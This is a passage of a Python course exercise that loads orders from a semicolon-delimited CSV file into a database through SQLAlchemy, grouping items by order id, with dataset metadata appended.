padrão pedidos.csv): \")\n\n if not nome_arquivo:\n nome_arquivo = \"pedidos.csv\"\n\n caminho_arquivo = os.path.join(os.getcwd(), \"arquivos\", nome_arquivo)\n\n lista_pedidos = {}\n\n with open(file=caminho_arquivo, mode='r', encoding=\"utf-8\") as arquivo:\n\n arquivo_csv = csv.DictReader(arquivo, delimiter=';')\n\n for linha in arquivo_csv:\n\n usuario = sessao.query(Usuario).filter_by(email=linha.get(\"email\")).first()\n\n produto = sessao.query(Produto).filter_by(sku=linha.get(\"sku\")).first()\n\n pedido_id = linha.get(\"pedido_id\")\n \n data_do_pedido=datetime.strptime(\n linha.get(\"data_do_pedido\"),\n \"%Y-%m-%d\"\n ).date()\n\n if not pedido_id in lista_pedidos.keys():\n lista_pedidos[pedido_id] = {\n \"usuario\": usuario,\n \"data_do_pedido\": data_do_pedido,\n \"produtos\": [{\n \"quantidade\": int(linha.get(\"quantidade\")),\n \"produto\": produto\n }]\n }\n\n else:\n lista_pedidos[pedido_id][\"produtos\"].append({\n \"quantidade\": int(linha.get(\"quantidade\")),\n \"produto\": produto\n })\n\n for _, info_pedido in lista_pedidos.items():\n pedido = Pedido(\n usuario=info_pedido.get(\"usuario\"),\n data_do_pedido=info_pedido.get(\"data_do_pedido\")\n )\n\n for produto in info_pedido.get(\"produtos\"):\n produto_pedido = ProdutoPedido(\n produto=produto.get(\"produto\"),\n quantidade=produto.get(\"quantidade\")\n )\n\n pedido.produtos.append(produto_pedido)\n\n sessao.add(produto_pedido)\n sessao.add(pedido)\n\n sessao.commit()\n\n except Exception as exc_info:\n print(f\"Erro ao carregar o arquivo: {exc_info}.\")","repo_name":"abispo/curso-python-proway-20231001","sub_path":"modulo02-python-com-banco-de-dados/20231203-aula05_desafio/carregar_pedidos.py","file_name":"carregar_pedidos.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"}